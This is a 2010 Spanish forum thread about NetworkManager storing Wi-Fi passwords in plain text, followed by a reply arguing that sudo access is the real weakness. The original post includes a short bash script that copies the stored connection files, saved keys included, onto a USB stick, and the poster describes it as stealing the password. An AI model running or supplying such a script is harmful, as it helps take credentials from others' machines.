Cotilleando Linux

Iniciado por Fayre, 29 Julio 2010, 22:00 PM

0 Miembros y 1 Visitante están viendo este tema.

Fayre

Hoy aburrido en mi casa sin bajar a la calle ya que con el verano de calor que estamos teniendo en España no apetece, me aburria y me decidi  buscar archivos de configuración de linux y hoy he dado con uno que no me a gustado nada se trata del archivo de configuración del NetworkMager el programa que nos hace mas facil la vida en linux para poder conectarnos sin tener que configurarlo todo a mano pero me dado cuenta de una cosa guarda todo en texto plano incluso las contraseñas Wifi y esto es lo que no me ha hecho mucha gracia el archivo se encuentra en:

/etc/NetworkManager/system-connections

y dentro de esta carpeta abra un archivito llamado como el SSID de vuestra wifi al intenatr abrirlo no he podido ya que soy un simple usuario pero al hacer un sudo cat SSID.De.La.Red me ha mostrado esto:

[connection]

id=Aqui salia el
SSID de mi red
.
uuid=
type=802-11-wireless

autoconnect=true

timestamp=1273841038



[802-11-wireless-security]

key-mgmt=none

wep-tx-keyidx=0

auth-alg=open

wep-key0= Y aquí mi contraseña.

wep-key-type=1



[ipv4]

method=manual

dns=62.42.230.24;64.42.63.53;8.8.8.8;
Los servidores DNS
addresses1=192.168.0.12;24;192.168.0.1;
La Ip de mi PC y la puerta de enlace.
ignore-auto-routes=false

ignore-auto-dns=false

dhcp-send-hostname=false

never-default=false



[ipv6]

method=ignore

ignore-auto-routes=false

ignore-auto-dns=false

never-default=false



[802-11-wireless]

ssid=82;101;100;76;111;99;97;108;68;101;70;97;110;100;82;

mode=infrastructure

channel=0

rate=0

tx-power=0

mtu=0

seen-bssids=;

security=802-11-wireless-security



Como podemos ver sale absolutamente todo el SSID la contraseña, la mac del router, tambien sale las ips y los servidores DNS pero esto no me molesta tenerlo en texto plano, pero el resto no se a ustedes pero a mi no me gusta tener guardada ninguna contraseña en texto plano en el ordenador aunque se necesite la contraseña del root para leerla. ¿Y ha ustedes que les parce un agujero de seguridad o no?. :-\

Tambien he programado un pequeño script que ejecutandolo desde un pendrive robaria esta contraseña y la guardaria en nuestro pendrive como ven es facilisimo hacerse con la contraseña teniendo acceso al PC.


#!/bin/bash
ruta=$0
cortada=${ruta%/*}
sudo cp "/etc/NetworkManager/system-connections/"* "$cortada"
comprobacion=$?
if [ "$comprobacion" = "0" ]; then
gdialog --msgbox "Correcto"
else
gdialog --msgbox "Fallido"
fi


Escrito por Fayre Salu2  ;D

[u]nsigned

Con sudo, un intruso podria hacer algo mas interesante como sudo passwd al root  :silbar:

El FS de linux esta protegido por permisos,asi que en todo caso la falla de seguridad es usar sudo, no que las claves se guarden en archivos planos sin cifrar pertenecientes al root  ;)

Saludos

No hay atajo ante la duda, el misterio se hace aquí...
Se hace carne en cada uno, el misterio es existir!